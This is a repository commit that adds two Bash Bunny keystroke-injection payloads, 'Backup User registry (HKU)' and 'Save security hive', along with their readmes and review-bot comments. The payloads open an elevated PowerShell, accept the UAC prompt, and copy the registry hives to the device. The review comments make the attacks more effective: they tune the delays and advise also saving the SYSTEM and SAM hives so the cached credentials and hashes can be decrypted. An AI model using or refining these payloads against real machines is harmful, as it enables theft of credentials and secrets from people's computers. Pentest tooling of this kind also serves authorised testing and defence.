Added new payload WIN_PoSH_HKU_RegBackUp (#424)
* Add files via upload
* Update readme.md
* Update payload.txt
* Update readme.md
* Update readme.md
* Update readme.md
* Update readme.md
* Update readme.md
* Add files via upload
* Update readme.md
* Update readme.md
* Add Payload WIN_PoSH_HKU_RegBackUp
* Update readme.md
* Update payload.txt
* Change for admin shell
* Update readme.md
* Update payload.txt
* Update payload.txt
* Update readme.md
* Added payload WIN_PoSH_SaveSecurityHive

Added new payload to exfiltration that saves the HKLM security hive to the bunny

Ref: pull/427/head
parent b8a329232a
commit 3904f165d9
@ -0,0 +1,23 @@
# Title: Backup User registry (HKU)
# Description: Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny
# Author: Cribbit
# Version: 1.1
# Category: Exfiltration
# Target: Windows 10 (Creators Update) (Powershell)
# Attackmodes: HID & STORAGE
# Config: Usesful root keys [ HKLM | HKCU | HKCR | HKU | HKCC ]

LED SETUP
ATTACKMODE HID STORAGE

LED ATTACK
Q DELAY 200
REM RUN WIN powershell -NoP -NonI -W Hidden -Exec Bypass ".(Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg'))"
Q GUI x
Q STRING a
Q DELAY 100
Q ALT y
Q DELAY 100
Q STRING "Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg') /y"
Q ENTER
LED FINISH
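Review bot: the two `Q DELAY 100` waits, one between `Q STRING a` and `Q ALT y` and one before the `Q STRING "Reg EXPORT HKU ..."` line, are too short for the flow they gate: Win+X, A launches an elevated PowerShell behind a UAC consent dialog that routinely takes far longer than 100 ms to appear, so the `y` lands in whatever window still has focus and the `Reg EXPORT` line is then typed into nothing. The sibling WIN_PoSH_SaveSecurityHive payload in this same commit waits `sleep 2` at both points; use the same value here (or `Q DELAY 2000`). Two smaller points: the `REM RUN WIN powershell -NoP -NonI -W Hidden -Exec Bypass ...` line is a leftover of the pre-1.1 non-elevated variant and should either be deleted or be documented in the readme as the fallback for a non-admin user, and the output name `loot\\keys.reg` is fixed and written with `/y`, so a second target silently overwrites the first; the sibling payload's `\$env:computername+'_...'` naming avoids that. Note also that `Q ALT y` only works when the logged-on user is a local administrator; for a standard user the UAC dialog asks for credentials and the payload stalls there.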
@ -0,0 +1,30 @@
# Backup User registry (HKU)
* Author: Cribbit
* Version: 1.1
* Target: Windows 10 (Creators Update) (Powershell)
* Category: Exfiltration
* Attackmode: HID & STORAGE

## Change Log
| Version | Changes |
| ------- | -------------------------------|
| 1.0 | Initial release |
| 1.1 | Use Admin Shell (for all keys) |

## Description
Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny.

## Configuration
RootKeys: [ HKLM | HKCU | HKCR | HKU | HKCC ]

Usesful Reg.exe export parameters:
* /y Force overwriting the existing file without prompt.
* /reg:32 Specifies the key should be accessed using the 32-bit registry view.
* /reg:64 Specifies the key should be accessed using the 64-bit registry view.

## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |
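Review bot: the `## Configuration` section lists `RootKeys: [ HKLM | HKCU | HKCR | HKU | HKCC ]` and three reg.exe switches, but nothing in payload.txt reads a configuration value; the only way to change the exported key is to edit the `Q STRING "Reg EXPORT HKU ..."` line by hand, so the readme should say exactly that (which line to edit, and that `/y` must stay or the export prompts and hangs). The description should also carry the precondition the changelog entry `Use Admin Shell (for all keys)` only hints at: the payload depends on the logged-on user being a local administrator, because the UAC prompt is accepted with `ALT y`. Worth one sentence too that `reg export HKU` only covers hives currently loaded under HKU (logged-on users, `.DEFAULT` and the service-account SIDs), not the NTUSER.DAT of other profiles on the machine, so "Backup User registry" overstates what the file contains. Typo: `Usesful` should read `Useful`.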
@ -0,0 +1,22 @@
# Title: Save security hive
# Description: Uses PowerShell, to run Reg.exe to save security hive to the bunny.
# Author: Cribbit
# Version: 1.0
# Category: Exfiltration
# Target: Windows 10 Creators Update (Powershell)
# Attackmodes: HID & STORAGE
# Props: Ben Clark (RTFM)

LED SETUP
ATTACKMODE HID STORAGE

LED ATTACK
Q DELAY 200
Q GUI x
Q STRING a
sleep 2
Q ALT y
sleep 2
Q STRING "Reg SAVE HKLM\Security ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_security.hive') /y"
Q ENTER
LED FINISH
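Review bot: `Reg SAVE HKLM\Security` on its own produces a hive that cannot be used offline: the LSA secrets and cached domain credentials stored in SECURITY are encrypted with the boot key, which lives in `HKLM\SYSTEM`, so the payload should also save `HKLM\SYSTEM` (and `HKLM\SAM` if local account hashes are the goal) into the same loot folder with the same `\$env:computername` prefix, for example a second `Q STRING "Reg SAVE HKLM\System ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_system.hive') /y"` followed by its own `Q ENTER` before `LED FINISH`. Style: the waits mix bash `sleep 2` with ducky `Q DELAY 200`; pick one form, and add a `# Config:` header line so the file stays parallel with the HKU payload in this same commit. As there, `Q ALT y` only clears the UAC dialog when the logged-on user is a local administrator; a standard user gets a credential prompt and the typed `Reg SAVE` line goes nowhere.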
@ -0,0 +1,26 @@
# Save security hive
* Author: Cribbit
* Version: 1.0
* Target: Windows 10 (Creators Update) (Powershell)
* Category: Exfiltration
* Attackmode: HID & STORAGE
* Props: Ben Clark (RTFM)

## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.0 | Initial release |

## Description
Uses PowerShell, to run Reg.exe to save security hive to the bunny.
## Configuration
Usesful Reg.exe save parameters:
* /y Force overwriting the existing file without prompt.
* /reg:32 Specifies the key should be accessed using the 32-bit registry view.
* /reg:64 Specifies the key should be accessed using the 64-bit registry view.
## Colors
| Status | Color | Description |
| --------- | ------------------------------| ------------------------------------------------ |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |
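Review bot: the `Usesful Reg.exe save parameters` list is a copy of the HKU readme's export list, but `/reg:32` and `/reg:64` are listed in the help for `reg export` and not in `REG SAVE KeyName FileName [/y]`; confirm with `reg save /?` and drop the two entries if reg.exe rejects them, leaving `/y`, which is the only switch the payload actually uses. The description should also say what the output is and what it is good for: a binary hive file (not a text `.reg` export like the HKU payload produces) that is only usable together with a saved `HKLM\SYSTEM` hive, since the secrets in SECURITY are encrypted under the boot key kept there. Two formatting nits against the HKU readme in this commit: the blank line before `## Configuration` and before `## Colors` is missing, and `Usesful` should read `Useful`.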